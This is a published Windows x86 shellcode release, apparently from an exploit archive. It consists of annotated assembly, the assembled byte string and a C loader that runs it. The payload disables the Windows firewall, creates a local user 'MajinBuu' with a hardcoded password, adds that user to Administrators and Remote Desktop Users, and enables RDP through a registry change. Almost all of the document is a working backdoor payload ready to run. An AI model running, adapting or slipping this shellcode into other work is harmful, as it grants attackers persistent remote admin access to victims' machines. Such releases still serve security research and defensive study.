## Exploit Title: Windows/x86 - MSVCRT System - Dynamic Null-free - Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) ## Exploit Author: Bobby Cooke ## Date: 2020-04-20 ## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86) ## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service. ## Commands used: ## 'netsh firewall set opmode mode=DISABLE' ## 'net user MajinBuu TurnU2C@ndy!! /add' ## 'net localgroup Administrators MajinBuu /add' ## 'net localgroup "Remote Desktop Users" MajinBuu /add' ## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' ; Create stack frame mov ebp, esp sub esp, 0x30 ; Find kernel32.dll base address xor ebx, ebx mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB mov ebx, [ebx+0xC] ; EBX = Address_of_LDR mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll ; Find the address of the Export Table within kernel32.dll mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader add ebx, eax ; EBX = &NewEXEHeader mov ebx, [ebx+0x78] ; EBX = RVA ExportTable add ebx, eax ; EBX = &ExportTable ; Find the address of the Name Pointer Table within kernel32.dll mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable add edi, eax ; EDI = &NamePointerTable mov [ebp-0x8], edi ; save &NamePointerTable to stack frame ; Find the address of the Ordinal Table mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable add ecx, eax ; ECX = &OrdinalTable mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame ; Find the address of the Address Table mov edx, [ebx+0x1C] ; EDX = RVA AddressTable add edx, eax ; EDX = &AddressTable mov [ebp-0x10], edx ; save &AddressTable to stack-frame ; Find Number of Functions within the Export Table of kernel32.dll mov edx, [ebx+0x14] ; EDX = Number of Functions mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame jmp short functions findFunctionAddr: ; Initialize the Counter to prevent infinite loop xor eax, eax ; EAX = Counter = 0 mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame ; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll searchLoop: mov edi, [ebp-0x8] ; EDI = &NamePointerTable mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for xor ecx, ecx ; ECX = 0x00000000 cld ; clear direction flag - Process strings from left to right mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00" jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop inc eax ; else Counter ++ cmp eax, edx ; Does EAX == Number of Functions? jb searchLoop ; If EAX != Number of Functions, then restart the loop found: ; Find the address of GetProcAddress by using the last value of the Counter mov ecx, [ebp-0xC] ; ECX = &OrdinalTable mov edx, [ebp-0x10] ; EDX = &AddressTable mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)] mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber] add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll ret functions: # Push string "GetProcAddress",0x00 onto the stack xor eax, eax ; clear eax register mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s" push 0x65726464 ; erdd : 65726464 // "GetProcAddress" push 0x41636f72 ; Acor : 41636f72 push 0x50746547 ; PteG : 50746547 mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp) call findFunctionAddr ; After Return EAX will = &GetProcAddress # EAX = &GetProcAddress mov [ebp-0x1C], eax ; save &GetProcAddress ; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00) xor edx, edx ; EDX = 0x00000000 push edx ; null terminator for LoadLibraryA string push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00 push 0x7262694c ; rbiL : 7262694c push 0x64616f4c ; daoL : 64616f4c push esp ; $hModule -- push the address of the start of the string onto the stack push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register call eax ; Call the GetProcAddress Function. mov [ebp-0x20], eax ; save Address of LoadLibraryA ; Call LoadLibraryA(PTR "msvcrt") ; push "msvcrt",0x00 to the stack and save pointer xor eax, eax ; clear eax mov ax, 0x7472 ; tr : 7472 push eax push 0x6376736D ; cvsm : 6376736D push esp ; push the pointer to the string mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register call ebx ; call the LoadLibraryA Function to load msvcrt.dll mov [ebp-0x24], eax ; save Address of msvcrt.dll ; Call GetProcAddress(msvcrt.dll, "system") xor edx, edx mov dx, 0x6d65 ; me : 6d65 push edx push 0x74737973 ; tsys : 74737973 push esp ; push pointer to string to stack for 'system' push dword [ebp-0x24] ; push base address of msvcrt.dll to stack mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX call eax ; GetProcAddress ; EAX = WSAStartup Address mov [ebp-0x28], eax ; save Address of msvcrt.system ; 'netsh firewall set opmode mode=DISABLE' xor ecx, ecx mov cx, 0x454c ; EL : 454c push ecx push 0x42415349 ; BASI : 42415349 push 0x443d6564 ; D=ed : 443d6564 push 0x6f6d2065 ; om e : 6f6d2065 push 0x646f6d70 ; domp : 646f6d70 push 0x6f207465 ; o te : 6f207465 push 0x73206c6c ; s ll : 73206c6c push 0x61776572 ; awer : 61776572 push 0x69662068 ; if h : 69662068 push 0x7374656e ; sten : 7374656e push esp ; push pointer to string mov eax, [ebp-0x28] ; msvcrt.system address call eax ; call system ; 'net user MajinBuu TurnU2C@ndy!! /add' xor ecx, ecx push ecx push 0x6464612f ; dda/ : 6464612f push 0x20212179 ; !!y : 20212179 push 0x646e4043 ; dn@C : 646e4043 push 0x32556e72 ; 2Unr : 32556e72 push 0x75542075 ; uT u : 75542075 push 0x75426e69 ; uBni : 75426e69 push 0x6a614d20 ; jaM : 6a614d20 push 0x72657375 ; resu : 72657375 push 0x2074656e ; ten : 2074656e push esp ; push pointer to string mov eax, [ebp-0x28] ; msvcrt.system address call eax ; call system ; 'net localgroup Administrators MajinBuu /add' xor ecx, ecx push ecx mov ecx, 0x64646190 ; dda : 646461 shr ecx, 8 push ecx push 0x2f207575 ; / uu : 2f207575 push 0x426e696a ; Bnij : 426e696a push 0x614d2073 ; aM s : 614d2073 push 0x726f7461 ; rota : 726f7461 push 0x72747369 ; rtsi : 72747369 push 0x6e696d64 ; nimd : 6e696d64 push 0x41207075 ; A pu : 41207075 push 0x6f72676c ; orgl : 6f72676c push 0x61636f6c ; acol : 61636f6c push 0x2074656e ; ten : 2074656e push esp ; push pointer to string mov eax, [ebp-0x28] ; msvcrt.system address call eax ; call system ; 'net localgroup "Remote Desktop Users" MajinBuu /add' xor ecx, ecx push ecx mov ecx, 0x64646190 ; dda : 646461 shr ecx, 8 push ecx push 0x2f207575 ; / uu : 2f207575 push 0x426e696a ; Bnij : 426e696a push 0x614d2022 ; aM " : 614d2022 push 0x73726573 ; sres : 73726573 push 0x5520706f ; U po : 5520706f push 0x746b7365 ; tkse : 746b7365 push 0x44206574 ; D et : 44206574 push 0x6f6d6552 ; omeR : 6f6d6552 push 0x22207075 ; " pu : 22207075 push 0x6f72676c ; orgl : 6f72676c push 0x61636f6c ; acol : 61636f6c push 0x2074656e ; ten : 2074656e push esp ; push pointer to string mov eax, [ebp-0x28] ; msvcrt.system address call eax ; call system ; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' xor ecx, ecx push ecx push 0x662f2030 ; f/ 0 : 662f2030 push 0x20642f20 ; d/ : 20642f20 push 0x44524f57 ; DROW : 44524f57 push 0x445f4745 ; D_GE : 445f4745 push 0x5220742f ; R t/ : 5220742f push 0x20736e6f ; sno : 20736e6f push 0x69746365 ; itce : 69746365 push 0x6e6e6f43 ; nnoC : 6e6e6f43 push 0x5354796e ; STyn : 5354796e push 0x65446620 ; eDf : 65446620 push 0x762f2022 ; v/ " : 762f2022 push 0x72657672 ; revr : 72657672 push 0x6553206c ; eS l : 6553206c push 0x616e696d ; anim : 616e696d push 0x7265545c ; reT\ : 7265545c push 0x6c6f7274 ; lort : 6c6f7274 push 0x6e6f435c ; noC\ : 6e6f435c push 0x7465536c ; teSl : 7465536c push 0x6f72746e ; ortn : 6f72746e push 0x6f43746e ; oCtn : 6f43746e push 0x65727275 ; erru : 65727275 push 0x435c4d45 ; C\ME : 435c4d45 push 0x54535953 ; TSYS : 54535953 push 0x5c454e49 ; \ENI : 5c454e49 push 0x4843414d ; HCAM : 4843414d push 0x5f4c4143 ; _LAC : 5f4c4143 push 0x4f4c5f59 ; OL_Y : 4f4c5f59 push 0x454b4822 ; EKH" : 454b4822 push 0x20646461 ; dda : 20646461 push 0x20676572 ; ger : 20676572 push esp ; push pointer to string mov eax, [ebp-0x28] ; msvcrt.system address call eax ; call system ###################################################################################### #include #include char code[] = \ "\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b" "\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7" "\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53" "\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b" "\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4" "\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50" "\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff" "\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f" "\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50" "\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52" "\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9" "\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d" "\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66" "\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68" "\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69" "\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45" "\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68" "\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64" "\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65" "\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68" "\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f" "\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70" "\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8" "\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68" "\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43" "\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76" "\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f" "\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f" "\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68" "\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61" "\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0"; int main(int argc, char **argv) { int (*func)(); func = (int(*)()) code; (int)(*func)(); }